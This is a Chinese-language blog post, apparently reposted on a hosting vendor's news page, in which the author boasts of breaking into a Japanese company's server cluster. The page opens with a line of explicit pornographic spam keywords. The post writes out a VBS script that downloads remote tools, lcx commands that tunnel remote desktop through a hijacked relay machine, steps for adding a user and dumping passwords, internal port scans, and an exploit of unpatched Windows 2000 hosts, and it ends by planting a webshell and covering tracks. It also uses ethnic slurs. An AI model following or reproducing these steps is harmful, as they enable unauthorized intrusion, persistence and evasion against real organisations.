五月综合激情婷婷六月,日韩欧美国产一区不卡,他扒开我内裤强吻我下面视频 ,无套内射无矿码免费看黄,天天躁,日日躁,狠狠躁

新聞動態(tài)

滲透日本服務器群

發(fā)布日期:2021-12-28 10:37 | 文章來源:站長之家

因為這一局,滲透獲取整個服務器群的權限,N臺服務器。所以寫篇文章小小虛榮下。^0^
開局:
入手點是一個注射點:sa,內(nèi)網(wǎng), 輕車熟路寫個vbs腳本,下好lcx,轉(zhuǎn)發(fā)端口。
以下是引用片段:
down.vbs
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2
use: cscript down.vbs http://ip/lcx.exe lcx.exe(路徑默認在system32下)
這個下載腳本可以重復使用,也不會暴露我存放工具的地址。(有些下載腳本把下載地址寫在里面,個人覺得不很好。)
由于本機連接日本網(wǎng)絡比較慢。連撥兩個VPN,再登上日本本土的一臺肉雞(我想這樣速度不會差了,ps:肉雞的作用體現(xiàn)出來了)。
加了用戶。在肉雞終端:lcx -listen 520 1982,目標機:lcx -slave myip 520 127.0.0.1 3389
ok,終端里填:127.0.0.1:1982 順利登陸。
中盤:
win2000系統(tǒng),mssql server
先抓個系統(tǒng)密碼,找下sql密碼。查看了下一些信息,并檢查是否還有同行的后門,清除之。
分析了下密碼:(數(shù)字+機器名+數(shù)字)
其他都是鳥語也看不太明白。載了幾個基本工具放個隱藏目錄。
ps:一般進去后總得收拾下,最好不要種馬。死得快,也易暴露。
這時候就盤算著怎么拿web的權限了。(分析網(wǎng)絡拓撲結構了)
先看下網(wǎng)上鄰居:
workgroup
C**SQL2006
B**-DB
B***TENDB
....
很明顯,都是數(shù)據(jù)庫服務器。
再往上一層,又發(fā)現(xiàn)一個工作組:
web-k.**.jp
c***oo_db
...
日,還是數(shù)據(jù)庫服務器。
ipconfig /all
192.168.10.18 只有一個內(nèi)網(wǎng)ip
ok:s tcp 192.168.10.1 192.168.10.254 80 20 /save
用s掃下內(nèi)網(wǎng)開80的機子,線程設置為20,講究精確度嘛。
很遺憾,結果出來的幾個機子都是數(shù)據(jù)庫服務器,上面并沒有網(wǎng)站。
我就納悶了,web服務器跑哪了呢?
收官:
翻了一陣子,仔細分析了網(wǎng)絡拓撲結構。最后讓我找到了:
192.168.1.1-255這段是web服務器群
接下來,用s果然掃出一片。再對應外網(wǎng)ip,挑選溢出的下手對象(192.168.1.19)(倭奴喜歡古董級的win2000,好多補丁都不全,好溢出)
很舒坦地日下來,然后載個webshell放到web目錄的偏僻角落。擦擦屁股走人。
ps:圖是我溢出另外一臺數(shù)據(jù)庫服務器時截下的


版權聲明:本站文章來源標注為YINGSOO的內(nèi)容版權均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站,禁止在非maisonbaluchon.cn所屬的服務器上建立鏡像,否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學習參考,不代表本站立場,如有內(nèi)容涉嫌侵權,請聯(lián)系alex-e#qq.com處理。

相關文章

實時開通

自選配置、實時開通

免備案

全球線路精選!

全天候客戶服務

7x24全年不間斷在線

專屬顧問服務

1對1客戶咨詢顧問

在線
客服

在線客服:7*24小時在線

客服
熱線

400-630-3752
7*24小時客服服務熱線

關注
微信

關注官方微信
頂部